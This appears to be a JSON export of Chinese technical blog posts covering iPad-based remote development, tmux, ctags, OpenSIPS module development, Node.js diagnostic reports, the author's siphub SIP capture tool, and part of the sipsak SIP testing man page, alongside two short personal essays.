前期准备工作 硬件准备 一台iPad 一个蓝牙键盘。最好买那种适合笔记本的蓝牙键盘,千万不要买可折叠的蓝牙键盘,因为用着不舒服 软件准备 常规的功能,例如写文字,写博客,一个浏览器足以胜任。唯一的难点在于如何编程。\n目前来说,有两个方案:\n方案1: 使用在线编辑器。例如码云,github, codepen等网站,都是提供在线编辑器的。优点是方便,免费。缺点也很明显,无法调试或者运行代码。 方案2: 购买云主机,iPad上安装Termius, ssh远程连接到服务端,在真正的操作系统中做开发。优点是比较自由,扩展性强。缺点是需要花钱,而且在没有IDE环境做开发是有不小的难度的。 方案1由于比较简单,就不赘述了。\n着重讲讲方案2:\n购买云主机 一般来说,即使是最低配置的主机,一年的费用也至少要几百块。但是也有例外情况。我的目标是找那些年费在一百块以内的云主机。\n针对大学生的优惠。一般大学生可以以几十块的价钱买到最低配的云主机。 针对新用户的优惠。新用户的优惠力度还是很大的。一般用过一年之后,我就会转战其他云服务提供商。所以国内的好多朵公有云,基本上我都上过。唯一没上过的就是筋斗云。 特殊优惠日。一般来说,一年之内,至少存在两个优惠日,双十一和六一八。在这两个时间点,一般可以买到比较优惠的云主机。 开发环境搭建 使用Termius连接到远程服务器上。注意最好在公有云上使用公钥登录,并禁止掉密码登录。最好再安装个fail2ban。因为每个云主机基本上每天都有很多恶意的登录尝试。 需要安装oh-my-zsh. 最好用的sh, 不解释。 作为开发环境,一个屏幕肯定是不够的,所以你需要tmux. 编辑器呢。锻炼自己的VIM使用能力吧。VIM是个外表比较冰冷的编辑器,上手难度相比于那些花花绿绿的编辑器而言,显得那么格格不入。但是就像有首歌唱的,有些人不知道哪里好,但就是谁也替代不了。 总之呢,你必须要强迫自己能够熟练的运用以下的几个软件:\nVIM tmux 后记 
","title":"使用iPad开发折腾记"},{"content":"早上六点多起床,搭乘半个小时的地铁,来到医院做体检。\n在抽血排队叫号的时候,我看到一位老奶奶被她女儿搀扶着坐在抽血的窗口前。\n老奶奶把右边的胳膊伸到抽血的垫子上,那是让人看一眼就难以忘记的皮肤。她的皮肤非常松弛,布满了褶皱,褶皱上有各种棕色和深色的斑点。\n我回想起了高中时学的生物学,皮肤是人类最大的一个器官,并且是保护人体的第一道防线。\n我不禁看了看自己胳膊,思绪万千。或许以后我的皮肤也是这样吧。这就是岁月的皮肤!\n时间啊!你走的慢点吧!\n人生很短,做些值得回忆的事情吧。\n","permalink":"https://wdd.js.org/posts/2020/08/cs9htr/","summary":"早上六点多起床,搭乘半个小时的地铁,来到医院做体检。\n在抽血排队叫号的时候,我看到一位老奶奶被她女儿搀扶着坐在抽血的窗口前。\n老奶奶把右边的胳膊伸到抽血的垫子上,那是让人看一眼就难以忘记的皮肤。她的皮肤非常松弛,布满了褶皱,褶皱上有各种棕色和深色的斑点。\n我回想起了高中时学的生物学,皮肤是人类最大的一个器官,并且是保护人体的第一道防线。\n我不禁看了看自己胳膊,思绪万千。或许以后我的皮肤也是这样吧。这就是岁月的皮肤!\n时间啊!你走的慢点吧!\n人生很短,做些值得回忆的事情吧。","title":"岁月的皮肤"},{"content":"我挺喜欢看动漫的,尤其是日漫(似乎也没有别的选择🐶)。\n小时候星空卫视放七龙珠,大学追火影和海贼王。日漫中梦想和激战总是少不了,这也是少年所必不可少的。但是日漫有个很大的特点,就是烂尾。\n没办法,漫画一旦达到了一定的连载时期,很多时候往往不受原作者控制了。这其中可能涉及到不少人的利益纠葛。\n与动辄几百集的日漫相比,美漫似乎更加偏向于短小精悍。\n近年来我也看过一些不错的美漫。例如瑞克和莫提,脆莓公园。这类漫画有个特点,就是更加现实,当然其中也不乏有温情出现。看这类漫画,让我想到李宗吾先生所说的厚黑学。感觉美国人是无师自通,深谙厚黑之哲学。\n也许动漫没有变,变的是我们自己:从梦想和激战转变到现实和厚黑。\n","permalink":"https://wdd.js.org/posts/2020/08/ybgr0g/","summary":"我挺喜欢看动漫的,尤其是日漫(似乎也没有别的选择🐶)。\n小时候星空卫视放七龙珠,大学追火影和海贼王。日漫中梦想和激战总是少不了,这也是少年所必不可少的。但是日漫有个很大的特点,就是烂尾。\n没办法,漫画一旦达到了一定的连载时期,很多时候往往不受原作者控制了。这其中可能涉及到不少人的利益纠葛。\n与动辄几百集的日漫相比,美漫似乎更加偏向于短小精悍。\n近年来我也看过一些不错的美漫。例如瑞克和莫提,脆莓公园。这类漫画有个特点,就是更加现实,当然其中也不乏有温情出现。看这类漫画,让我想到李宗吾先生所说的厚黑学。感觉美国人是无师自通,深谙厚黑之哲学。\n也许动漫没有变,变的是我们自己:从梦想和激战转变到现实和厚黑。","title":"从日漫到美漫"},{"content":"module_exports 这个结构在每个模块中都有,这个有点类似js的export或者说是node.js的module.exports。\n这是一个接口的规范。\n着重讲解几个关键点:\nlocal_zone_code是模块名字,这个是必需的 cmds表示在opensips脚本里可以有哪些暴露的函数 params规定了模块的参数 mod_init在模块初始化的时候会被调用, 只会被调用一次 关于module_exports这个结构的定义,可以查阅:sr_module.h文件\nstruct module_exports exports= { \u0026#34;local_zone_code\u0026#34;, MOD_TYPE_DEFAULT,/* class of this module */ MODULE_VERSION, DEFAULT_DLFLAGS, /* dlopen flags */ 0, /* load function */ NULL, /* OpenSIPS module dependencies */ cmds, 0, params, 0, /* exported statistics */ 0, /* exported MI functions */ 0, /* exported pseudo-variables */ 0, /* exported transformations */ 0, /* extra processes */ 0, /* 
pre-init function */ mod_init, (response_function) 0, (destroy_function) 0, 0 /* per-child init function */ }; cmds struct cmd_export_ { char* name; /* opensips脚本里的函数名 */ cmd_function function; /* 关联的C代码里的函数 */ int param_no; /* 参数的个数 */ fixup_function fixup; /* 修正参数 */ free_fixup_function free_fixup; /* 修正参数的 */ int flags; /* 函数flag,主要是用来标记函数可以在哪些路由中使用 */ }; cmd_function\ntypedef int (*cmd_function)(struct sip_msg*, char*, char*, char*, char*, char*, char*); cmd_function与fixup_function的关系 cmd_function是在opensips运行后,在路由脚本中会执行到 fixup_function实际上是在opensips运行前,脚本解析完成后会执行 fixup_function的目的是在脚本解析阶段发现参数的问题,或者修改某些参数的值 真实的栗子:\nstatic cmd_export_t cmds[]={ {\u0026#34;lzc_change\u0026#34;, (cmd_function)change_code, 2, change_code_fix, 0, REQUEST_ROUTE}, {0,0,0,0,0,0} }; static int change_code_fix(void** param, int param_no) { LM_INFO(\u0026#34;enter change_code_fix: param: %s\\n\u0026#34;, (char *)*param); LM_INFO(\u0026#34;enter change_code_fix: param_no: %d\\n\u0026#34;, param_no); LM_INFO(\u0026#34;enter change_code_fix: local_zone_code: %s len:%d\\n\u0026#34;, local_zone_code.s,local_zone_code.len); return 0; } 上面的定义,可以在opensips脚本中使用lzc_change这个函数。这个函数对应c代码里的change_code函数。这个函数允许接受2两个参数。\nopensips脚本\nroute{ lzc_change(\u0026#34;abcd\u0026#34;,\u0026#34;desf\u0026#34;); } debug日志:从日志可以看出来lzc_change有两个参数,change_code_fix被调用了两次,每次调用可以获取参数的值,和参数的序号。\nDBG:core:fix_actions: fixing lzc_change, opensips.mf2.cfg:18 INFO:local_zone_code:change_code_fix: enter change_code_fix: param: abcd INFO:local_zone_code:change_code_fix: enter change_code_fix: param_no: 1 INFO:local_zone_code:change_code_fix: enter change_code_fix: local_zone_code: 0728 len:4 INFO:local_zone_code:change_code_fix: enter change_code_fix: param: desf INFO:local_zone_code:change_code_fix: enter change_code_fix: param_no: 2 INFO:local_zone_code:change_code_fix: enter change_code_fix: local_zone_code: 0728 len:4 ","permalink":"https://wdd.js.org/opensips/module-dev/l5/","summary":"module_exports 
这个结构在每个模块中都有,这个有点类似js的export或者说是node.js的module.export。\n这是一个接口的规范。\n重要讲解几个关键点:\nlocal_zone_code是模块名字,这个是必需的 cmds表示在opensips脚本里可以有那些暴露的函数 params规定了模块的参数 mod_init在模块初始化的时候会被调用, 只会被调用一次 关于module_exports这个结构的定义,可以查阅:sr_module.h文件\nstruct module_exports exports= { \u0026#34;local_zone_code\u0026#34;, MOD_TYPE_DEFAULT,/* class of this module */ MODULE_VERSION, DEFAULT_DLFLAGS, /* dlopen flags */ 0, /* load function */ NULL, /* OpenSIPS module dependencies */ cmds, 0, params, 0, /* exported statistics */ 0, /* exported MI functions */ 0, /* exported pseudo-variables */ 0, /* exported transformations */ 0, /* extra processes */ 0, /* pre-init function */ mod_init, (response_function) 0, (destroy_function) 0, 0 /* per-child init function */ }; cmds struct cmd_export_ { char* name; /* opensips脚本里的函数名 */ cmd_function function; /* 关联的C代码里的函数 */ int param_no; /* 参数的个数 */ fixup_function fixup; /* 修正参数 */ free_fixup_function free_fixup; /* 修正参数的 */ int flags; /* 函数flag,主要是用来标记函数可以在哪些路由中使用 */ }; cmd_function","title":"概念理解 module_exports"},{"content":"Makefile ---src |___Makefile |___main.c 如何编写顶层的Makefiel, 使其进入到src中,执行src中的Makefile?\nrun: $(MAKE) -C src target a=1 b=2 ","permalink":"https://wdd.js.org/posts/2020/08/rudtng/","summary":"Makefile ---src |___Makefile |___main.c 如何编写顶层的Makefiel, 使其进入到src中,执行src中的Makefile?\nrun: $(MAKE) -C src target a=1 b=2 ","title":"统一入口Makefile"},{"content":"tmux使用场景 远程ssh连接到服务器,最难受的是随时有可能ssh掉线,然后一切都需要花额外的时间重新恢复,也有可能一些工作只能重新开始。\n在接续介绍tmux之前,先说说mosh。\n【mosh架构图】\n我曾使用过mosh, 据说mosh永远不会掉线。实际上有可能的确如此,但是mosh实际上安装比较麻烦。mosh需要在服务端安装server, 然后要在你本地的电脑上安装client, 然后通过这个client去连接mosh服务端的守护进程。mosh需要安装在客户端服务端都安装软件,然后可能还要设置一下网络策略,才能真正使用。\nmosh需要改变很多,这在生产环境是不可能的。另外即使是自己的开发环境,这样搞起来也是比较麻烦的。\n下图是tmux的架构图。实际上我们只需要在服务端安装tmux, 剩下的ssh的连接都可以用标准的功能。 【tmux架构图】\ntmux概念:sesssion, window, panes 概念不清楚,往往是觉得tmux难用的关键点。\nsession之间是相互隔离的,tmux可以启动多个session 一个session可以有多个window 一个window可以有多个panes 在tmux中按ctrl-b w, 可以在sesion,window和panel之间跳转。\n注意:默认情况下,一个sesion默认会打开一个window, 
一个window会默认打开一个pane。\nsession操作 创建新的sesssion: tmux new -s some_name 脱离session: ctrl-b +d 注意即使脱离session, session中的内容还是在继续工作的 进入某个session: tmux attach -t some_name 查看sesion列表: tmux ls kill某个session: tmux kill-session -t some_name kill所有session: tmux kill-server 重命名session: ctrl-b $ 选择session: ctrl-b s window操作 新建: ctrl-b c 查看列表: ctrl-b w 关闭当前window: ctrl-b \u0026amp; 重命名当前window: ctrl-b , 切换到上一个window: ctrl-b p 切换到下一个window: ctrl-b n 按序号切换到制定的window: ctrl-b 数字 数字可以用0-9 panes操作 pane相当于分屏,所有pane都是在一个窗口里都显示出来的。这点和window不同,一个window显示出来,则意味着其他window是隐藏的。\n在做代码对比,或者一遍参考另一个代码,一遍写当前代码时,可以考虑使用pane分屏。\n垂直分屏: ctrl-b % 水平分屏: ctrl-b \u0026quot; 依次切换: ctrl-b o 按箭头键切换: ctrl-b 箭头 重新布局: ctrl-b 空格键 最大化当前pane: ctrl-b z 关闭当前pane: ctrl-b x 将panne转为新的window: ctrl-b ! 显示Pannel编号 ctrl-b q 向左移动pannel ctrl-b { 向右移动pannel ctrl-b } resize panne\nresize-pane -D 20 resize down resize-pane -U 20 resize up resize-pane -L 20 resize left resize-pane -R 20 resize right 杂项 查看时间: ctrl-b t 内部操作 当你已经进入tmux时,如何新建一个session或者关闭一个session呢?\n新建session ctrl-b : 进入命令行模式,然后输入: new -s session-name 关闭sesssion ctrl-b : 进入命令行模式,然后输入: kill-session -t session-name tmux 设置活跃window的状态栏背景色 # tmux 1.x set-window-option -g window-status-current-bg red # tmux 2.9 setw -g window-status-current-style fg=black,bg=white 参考 https://unix.stackexchange.com/questions/210174/set-the-active-tmux-tab-color ","permalink":"https://wdd.js.org/posts/2020/08/osz3gu/","summary":"tmux使用场景 远程ssh连接到服务器,最难受的是随时有可能ssh掉线,然后一切都需要花额外的时间重新恢复,也有可能一些工作只能重新开始。\n在接续介绍tmux之前,先说说mosh。\n【mosh架构图】\n我曾使用过mosh, 据说mosh永远不会掉线。实际上有可能的确如此,但是mosh实际上安装比较麻烦。mosh需要在服务端安装server, 然后要在你本地的电脑上安装client, 然后通过这个client去连接mosh服务端的守护进程。mosh需要安装在客户端服务端都安装软件,然后可能还要设置一下网络策略,才能真正使用。\nmosh需要改变很多,这在生产环境是不可能的。另外即使是自己的开发环境,这样搞起来也是比较麻烦的。\n下图是tmux的架构图。实际上我们只需要在服务端安装tmux, 剩下的ssh的连接都可以用标准的功能。 【tmux架构图】\ntmux概念:sesssion, window, panes 概念不清楚,往往是觉得tmux难用的关键点。\nsession之间是相互隔离的,tmux可以启动多个session 一个session可以有多个window 一个window可以有多个panes 在tmux中按ctrl-b w, 
可以在sesion,window和panel之间跳转。\n注意:默认情况下,一个sesion默认会打开一个window, 一个window会默认打开一个pane。\nsession操作 创建新的sesssion: tmux new -s some_name 脱离session: ctrl-b +d 注意即使脱离session, session中的内容还是在继续工作的 进入某个session: tmux attach -t some_name 查看sesion列表: tmux ls kill某个session: tmux kill-session -t some_name kill所有session: tmux kill-server 重命名session: ctrl-b $ 选择session: ctrl-b s window操作 新建: ctrl-b c 查看列表: ctrl-b w 关闭当前window: ctrl-b \u0026amp; 重命名当前window: ctrl-b , 切换到上一个window: ctrl-b p 切换到下一个window: ctrl-b n 按序号切换到制定的window: ctrl-b 数字 数字可以用0-9 panes操作 pane相当于分屏,所有pane都是在一个窗口里都显示出来的。这点和window不同,一个window显示出来,则意味着其他window是隐藏的。","title":"tmux深度教学"},{"content":"关键技术 Docker: 容器 kuberneter:架构与部署 HELM: 打包和部署 Prometheus: 监控 Open TRACING + ZIPKIN : 分布式追踪 关键性能指标 I/O 性能: 启动耗时: 当服务出现故障,需要重启时,启动的速度越快,对客户的影响越小。 内存使用: ","permalink":"https://wdd.js.org/posts/2020/08/lrzu06/","summary":"关键技术 Docker: 容器 kuberneter:架构与部署 HELM: 打包和部署 Prometheus: 监控 Open TRACING + ZIPKIN : 分布式追踪 关键性能指标 I/O 性能: 启动耗时: 当服务出现故障,需要重启时,启动的速度越快,对客户的影响越小。 内存使用: ","title":"打造高可扩展性的微服务"},{"content":"在v11.7.0中加入实验性功能,诊断报告。诊断报告的输出是一个json文件,包括以下信息。\n进程信息 操作系统信息 堆栈信息 内存资源使用 libuv状态 环境变量 共享库 诊断报告的原始信息 如何产生诊断报告 必需使用 \u0026ndash;experimental-report 来启用 process.report.writeReport() 来输出诊断报告 node --experimental-report --diagnostic-report-filename=YYYYMMDD.HHMMSS.PID.SEQUENCE#.txt --eval \u0026#34;process.report.writeReport(\u0026#39;report.json\u0026#39;)\u0026#34; Writing Node.js report to file: report.json Node.js report completed 用编辑器打开诊断报告,可以看到类似下面的内容。\n如何从诊断报告中分析问题? 
诊断报告很长,不太好理解。IBM开发了report-toolkit工具,可以用来分析。 要求:node \u0026gt; 11.8.0\nnpm install report-toolkit --global 或者 yarn global add report-toolkit 查看帮助信息\nrtk --help 自动出发报告 node --experimental-report \\ --diagnostic-report-on-fatalerror \\ --diagnostic-report-uncaught-exception \\ index.js $ node –help grep report --experimental-report enable report generation 启用report功能 --diagnostic-report-on-fatalerror generate diagnostic report on fatal (internal) errors 产生报告当发生致命错误 --diagnostic-report-on-signal generate diagnostic report upon receiving signals 产生报告当收到信号 --diagnostic-report-signal=... causes diagnostic report to be produced on provided signal. Unsupported in Windows. (default: SIGUSR2) --diagnostic-report-uncaught-exception generate diagnostic report on uncaught exceptions 产生报告当出现未捕获的异常 --diagnostic-report-directory=... define custom report pathname. (default: current working directory of Node.js process) --diagnostic-report-filename=... define custom report file name. (default: YYYYMMDD.HHMMSS.PID.SEQUENCE#.txt) 参考 https://nodejs.org/dist/latest-v12.x/docs/api/report.html https://ibm.github.io/report-toolkit/quick-start https://developer.ibm.com/technologies/node-js/articles/introducing-report-toolkit-for-nodejs-diagnostic-reports ","permalink":"https://wdd.js.org/fe/nodejs-report/","summary":"在v11.7.0中加入实验性功能,诊断报告。诊断报告的输出是一个json文件,包括以下信息。\n进程信息 操作系统信息 堆栈信息 内存资源使用 libuv状态 环境变量 共享库 诊断报告的原始信息 如何产生诊断报告 必需使用 \u0026ndash;experimental-report 来启用 process.report.writeReport() 来输出诊断报告 node --experimental-report --diagnostic-report-filename=YYYYMMDD.HHMMSS.PID.SEQUENCE#.txt --eval \u0026#34;process.report.writeReport(\u0026#39;report.json\u0026#39;)\u0026#34; Writing Node.js report to file: report.json Node.js report completed 用编辑器打开诊断报告,可以看到类似下面的内容。\n如何从诊断报告中分析问题? 
诊断报告很长,不太好理解。IBM开发了report-toolkit工具,可以用来分析。 要求:node \u0026gt; 11.8.0\nnpm install report-toolkit --global 或者 yarn global add report-toolkit 查看帮助信息\nrtk --help 自动出发报告 node --experimental-report \\ --diagnostic-report-on-fatalerror \\ --diagnostic-report-uncaught-exception \\ index.js $ node –help grep report --experimental-report enable report generation 启用report功能 --diagnostic-report-on-fatalerror generate diagnostic report on fatal (internal) errors 产生报告当发生致命错误 --diagnostic-report-on-signal generate diagnostic report upon receiving signals 产生报告当收到信号 --diagnostic-report-signal=.","title":"Nodejs诊断报告"},{"content":"安装 # ubuntu or debian apt-get install ctags # centos yum install ctags # centos # macOSX brew install ctags 注意,如果在macOS 上输入ctags -R, 可能会有报错 /Library/Developer/CommandLineTools/usr/bin/ctags: illegal option -- R usage: ctags [-BFadtuwvx] [-f tagsfile] file ... 那么你可以输入which ctags: /usr/bin/ctags # 如果输出是这个,那么路径就是错的。正确的目录应该是/usr/local/bin/ctags 那么你可以在你的.zshrc或者其他配置文件中,增加一个alias alias ctags=\u0026#34;/usr/local/bin/ctags\u0026#34; 使用 进入到项目跟目录\nctags -R # 当前目录及其子目录生成ctags文件 进入vim vim main.c # :set tags=$PWD/tags #让vim读区当前文件下的ctags文件 # 在多个文件的场景下,最好用绝对路径设置tags文件的位置 # 否则有可能会报错neovim E433: No tags file 快捷键 Ctrl+] 跳转到标签定义的地方 Ctrl+o 跳到之前的地方 ctrl+t 回到跳转之前的标签处 :ptag some_key 打开新的面板预览some_key的定义 下一个定义处 上一个定义处 gd 当前函数内查找当前标识符的定义处 gD 当前文件查找标识符的第一次定义处 ","permalink":"https://wdd.js.org/posts/2020/08/ed6944/","summary":"安装 # ubuntu or debian apt-get install ctags # centos yum install ctags # centos # macOSX brew install ctags 注意,如果在macOS 上输入ctags -R, 可能会有报错 /Library/Developer/CommandLineTools/usr/bin/ctags: illegal option -- R usage: ctags [-BFadtuwvx] [-f tagsfile] file ... 
那么你可以输入which ctags: /usr/bin/ctags # 如果输出是这个,那么路径就是错的。正确的目录应该是/usr/local/bin/ctags 那么你可以在你的.zshrc或者其他配置文件中,增加一个alias alias ctags=\u0026#34;/usr/local/bin/ctags\u0026#34; 使用 进入到项目跟目录\nctags -R # 当前目录及其子目录生成ctags文件 进入vim vim main.c # :set tags=$PWD/tags #让vim读区当前文件下的ctags文件 # 在多个文件的场景下,最好用绝对路径设置tags文件的位置 # 否则有可能会报错neovim E433: No tags file 快捷键 Ctrl+] 跳转到标签定义的地方 Ctrl+o 跳到之前的地方 ctrl+t 回到跳转之前的标签处 :ptag some_key 打开新的面板预览some_key的定义 下一个定义处 上一个定义处 gd 当前函数内查找当前标识符的定义处 gD 当前文件查找标识符的第一次定义处 ","title":"vim ctags安装及使用"},{"content":"o我写siphub的原因是homer太难用了!!经常查不到想查的数据,查询的速度也很慢。\n项目地址:https://github.com/wangduanduan/siphub\n架构 SIP服务器例如OpenSIPS或者FS可以通过hep协议将数据写到siphub, siphub将数据规整之后写入MySql, siphub同时也提供Web页面来查询和展示SIP消息。 功能介绍 sip-hub是一个专注sip信令的搜索以及时序图可视化展示的服务。\n相比于Homer, sip-hub做了大量的功能简化。同时也提供了一些个性化的查询,例如被叫后缀查询,仅域名查询等。\nsip-hub服务仅有3个页面\nsip消息搜索页面,用于按照主被叫、域名和时间范围搜索呼叫记录 时序图展示页面,用于展示SIP时序图和原始SIP消息 可以导入导出SIP消息 可以查找A-Leg 监控功能 大量简化搜索结果页面。siphub的搜索结果页面,每个callId相同的消息,只展示一条。 相关截图 搜索页面 siphub的搜索结果仅仅展示callId相同的最早的一条记录,这样就避免了像homer那种,看起来很多个消息,实际上都是属于一个INVITE的。 From字段和To字段都支持域名查询:@test.cc From字段也支持后缀查询,例如1234这种号码,可以只输入234就能查到,但是后缀要写完整,只查23是查不到的。 To字段仅仅支持精确查询 信令展示页面 点击对应的消息,详情也会自动跳转出来。 安装 首先需要安装MySql数据库,并在其中建立一个名为siphub的数据库 运行 dbHost 数据库地址 dbUser 数据库用户 dbName 数据库名 dataKeepDays 抓包保存天数 3000端口是web页面端口 9060是hep消息收取端口 docker run -d -p 3000:3000 -p 9060:9060/udp \\ --env NODE_ENV=production \\ --env dbHost=1.2.3.4 \\ --env dbUser=root \\ --env dbPwd=123456 \\ --env dbName=siphub \\ --env dataKeepDays=3 \\ --name siphub wangduanduan/siphub 集成 OpenSIPS集成 test witch OpenSIPS 2.4\n# add hep listen listen=hep_udp:your_ip:9061 loadmodule \u0026#34;proto_hep.so\u0026#34; # replace SIP_HUB_IP_PORT with siphub‘s ip:port modparam(\u0026#34;proto_hep\u0026#34;, \u0026#34;hep_id\u0026#34;,\u0026#34;[hep_dst] SIP_HUB_IP_PORT;transport=udp;version=3\u0026#34;) loadmodule \u0026#34;siptrace.so\u0026#34; modparam(\u0026#34;siptrace\u0026#34;, \u0026#34;trace_id\u0026#34;,\u0026#34;[tid]uri=hep:hep_dst\u0026#34;) # add 
ite in request route(); if(!is_method(\u0026#34;REGISTER\u0026#34;) \u0026amp;\u0026amp; !has_totag()){ sip_trace(\u0026#34;tid\u0026#34;, \u0026#34;d\u0026#34;, \u0026#34;sip\u0026#34;); } FreeSWITCH集成 fs version 版本要高于 1.6.8+\n编辑: sofia.conf.xml\n用真实的siphub ip:port替换SIP_HUB_IP_PORT\n\u0026lt;param name=\u0026#34;capture-server\u0026#34; value=\u0026#34;udp:SIP_HUB_IP_PORT\u0026#34;/\u0026gt; freeswitch@fsnode04\u0026gt; sofia global capture on +OK Global capture on freeswitch@fsnode04\u0026gt; sofia global capture off +OK Global capture off 注意:sip_profiles里面的也要设置为yes\nsip_profiles/internal.xml \u0026lt;param name=\u0026#34;sip-capture\u0026#34; value=\u0026#34;yes\u0026#34;/\u0026gt; sip_profiles/external-ipv6.xml \u0026lt;param name=\u0026#34;sip-capture\u0026#34; value=\u0026#34;yes\u0026#34;/\u0026gt; sip_profiles/external.xml \u0026lt;param name=\u0026#34;sip-capture\u0026#34; value=\u0026#34;yes\u0026#34;/\u0026gt; ","permalink":"https://wdd.js.org/opensips/tools/siphub/","summary":"o我写siphub的原因是homer太难用了!!经常查不到想查的数据,查询的速度也很慢。\n项目地址:https://github.com/wangduanduan/siphub\n架构 SIP服务器例如OpenSIPS或者FS可以通过hep协议将数据写到siphub, siphub将数据规整之后写入MySql, siphub同时也提供Web页面来查询和展示SIP消息。 功能介绍 sip-hub是一个专注sip信令的搜索以及时序图可视化展示的服务。\n相比于Homer, sip-hub做了大量的功能简化。同时也提供了一些个性化的查询,例如被叫后缀查询,仅域名查询等。\nsip-hub服务仅有3个页面\nsip消息搜索页面,用于按照主被叫、域名和时间范围搜索呼叫记录 时序图展示页面,用于展示SIP时序图和原始SIP消息 可以导入导出SIP消息 可以查找A-Leg 监控功能 大量简化搜索结果页面。siphub的搜索结果页面,每个callId相同的消息,只展示一条。 相关截图 搜索页面 siphub的搜索结果仅仅展示callId相同的最早的一条记录,这样就避免了像homer那种,看起来很多个消息,实际上都是属于一个INVITE的。 From字段和To字段都支持域名查询:@test.cc From字段也支持后缀查询,例如1234这种号码,可以只输入234就能查到,但是后缀要写完整,只查23是查不到的。 To字段仅仅支持精确查询 信令展示页面 点击对应的消息,详情也会自动跳转出来。 安装 首先需要安装MySql数据库,并在其中建立一个名为siphub的数据库 运行 dbHost 数据库地址 dbUser 数据库用户 dbName 数据库名 dataKeepDays 抓包保存天数 3000端口是web页面端口 9060是hep消息收取端口 docker run -d -p 3000:3000 -p 9060:9060/udp \\ --env NODE_ENV=production \\ --env dbHost=1.2.3.4 \\ --env dbUser=root \\ --env dbPwd=123456 \\ --env dbName=siphub \\ --env dataKeepDays=3 \\ --name siphub 
wangduanduan/siphub 集成 OpenSIPS集成 test witch OpenSIPS 2.","title":"siphub 轻量级实时SIP信令收包的服务"},{"content":"sipsak is a command line tool which can send simple requests to a SIP server. It can run additional tests on a SIP server which are usefull for admins and developers of SIP enviroments.\nhttps://github.com/nils-ohlmeier/sipsak\n安装 apt-get install sipsak 发送options sipsak -vv -p 192.168.2.63:5060 -s sip:8001@test.cc man SIPSAK(1) User Manuals SIPSAK(1) NAME sipsak - a utility for various tests on sip servers and user agents SYNOPSIS sipsak [-dFGhiILnNMRSTUVvwz] [-a PASSWORD ] [-b NUMBER ] [-c SIPURI ] [-C SIPURI ] [-D NUMBER ] [-e NUMBER ] [-E STRING ] [-f FILE ] [-g STRING ] [-H HOSTNAME ] [-j STRING ] [-J STRING ] [-l PORT ] [-m NUMBER ] [-o NUMBER ] [-p HOSTNAME ] [-P NUMBER ] [-q REGEXP ] [-r PORT ] [-t NUMBER ] [-u STRING ] [-W NUMBER ] [-x NUMBER ] -s SIPURI DESCRIPTION sipsak is a SIP stress and diagnostics utility. It sends SIP requests to the server within the sip-uri and examines received responses. It runs in one of the following modes: - default mode A SIP message is sent to destination in sip-uri and reply status is displayed. The request is either taken from filename or generated as a new OPTIONS message. - traceroute mode (-T) This mode is useful for learning request\u0026#39;s path. It operates similarly to IP-layer utility traceroute(8). - message mode (-M) Sends a short message (similar to SMS from the mobile phones) to a given target. With the option -B the content of the MESSAGE can be set. Useful might be the options -c and -O in this mode. - usrloc mode (-U) Stress mode for SIP registrar. sipsak keeps registering to a SIP server at high pace. Additionally the registrar can be stressed with the -I or the -M option. If -I and -M are omitted sipsak can be used to register any given contact (with the -C option) for an account at a registrar and to query the current bindings for an account at a registrar. - randtrash mode (-R) Parser torture mode. 
sipsak keeps sending randomly corrupted messages to torture a SIP server\u0026#39;s parser. - flood mode (-F) Stress mode for SIP servers. sipsak keeps sending requests to a SIP server at high pace. If libruli (http://www.nongnu.org/ruli/) or c-ares (http://daniel.haxx.se/projects/c-ares/) support is compiled into the sipsak binary, then first a SRV lookup for _sip._tcp.hostname is made. If that fails a SRV lookup for _sip._udp.hostname is made. And if this lookup fails a normal A lookup is made. If a port was given in the target URI the SRV lookup is omitted. Failover, load distribution and other transports are not supported yet. OPTIONS -a, --password PASSWORD With the given PASSWORD an authentication will be tryed on received \u0026#39;401 Unauthorized\u0026#39;. Authorization will be tryed on time. If this option is omitted an authorization with an empty password (\u0026#34;\u0026#34;) will be tryed. If the password is equal to - the password will be read from the standard input (e.g. the keyboard). This prevents other users on the same host from seeing the password the password in the process list. NOTE: the password still can be read from the memory if other users have access to it. -A, --timing prints only the timing values of the test run if verbosity is zero because no -v was given. If one or more -v were given this option will be ignored. -b, --apendix-begin NUMBER The starting number which is appended to the user name in the usrloc mode. This NUMBER is increased until it reaches the value given by the -e parameter. If omitted the starting number will be one. -B, --message-body STRING The given STRING will be used as the body for outgoing MESSAGE requests. -c, --from SIPURI The given SIPURI will be used in the From header if sipsak runs in the message mode (initiated with the -M option). This is helpful to present the receiver of a MESSAGE a meaningfull and usable address to where maybe even responses can be send. 
-C, --contact SIPURI This is the content of the Contact header in the usrloc mode. This allows to insert forwards like for mail. For example you can insert the uri of your first SIP account at a second account, thus all calls to the second account will be for‐ warded to the first account. As the argument to this option will not be enclosed in brackets you can give also multiple contacts in the raw format as comma separated list. The special words empty or none will result in no contact header in the REGISTER request and thus the server should answer with the current bindings for the account at the registrar. The special words * or star will result in Contact header containing just a star, e.g. to remove all bindings by using expires value 0 together with this Contact. -d, --ignore-redirects If this option is set all redirects will be ignored. By default without this option received redirects will be respected. This option is automatically activated in the randtrash mode and in the flood mode. -D, --timeout-factor NUMBER The SIP_T1 timer is getting multiplied with the given NUMBER. After receiving a provisional response for an INVITE request, or when a reliable transport like TCP or TLS is used sipsak waits for the resulting amount of time for a final response until it gives up. -e, --appendix-end NUMBER The ending number which is appended to the user name in the usrloc mode. This number is increased until it reaches this ending number. In the flood mode this is the maximum number of messages which will be send. If omitted the default value is 2^31 (2147483647) in the flood mode. -E, --transport STRING The value of STRING will be used as IP transport for sending and receiving requests and responses. This option over‐ writes any result from the URI evaluation and SRV lookup. Currently only \u0026#39;udp\u0026#39; and \u0026#39;tcp\u0026#39; are accepted as value for STRING. 
-f, --filename FILE The content of FILE will be read in in binary mode and will be used as replacement for the alternatively created sip mes‐ sage. This can used in the default mode to make other requests than OPTIONS requests (e.g. INVITE). By default missing carriage returns in front of line feeds will be inserted (use -L to de-activate this function). If the filename is equal to - the file is read from standard input, e.g. from the keyboard or a pipe. Please note that the manipulation functions (e.g. inserting Via header) are only tested with RFC conform requests. Additionally special strings within the file can be replaced with some local or given values (see -g and -G for details). -F, --flood-mode This options activates the flood mode. In this mode OPTIONS requests with increasing CSeq numbers are sent to the server. Replies are ignored -- source port 9 (discard) of localhost is advertised in topmost Via. -h, --help Prints out a simple usage help message. If the long option --help is available it will print out a help message with the available long options. -g, --replace-string STRING Activates the replacement of $replace$ within the request (usually read in from a file) with the STRING. Alternatively you can also specify a list of attribute and values. This list has to start and end with a non alpha-numeric character. The same character has to be used also as separator between the attribute and the value and between new further attribute value pairs. The string \u0026#34;$attribute$\u0026#34; will be replaced with the value string in the message. -G, --replace Activates the automatic replacement of the following variables in the request (usually read in from a file): 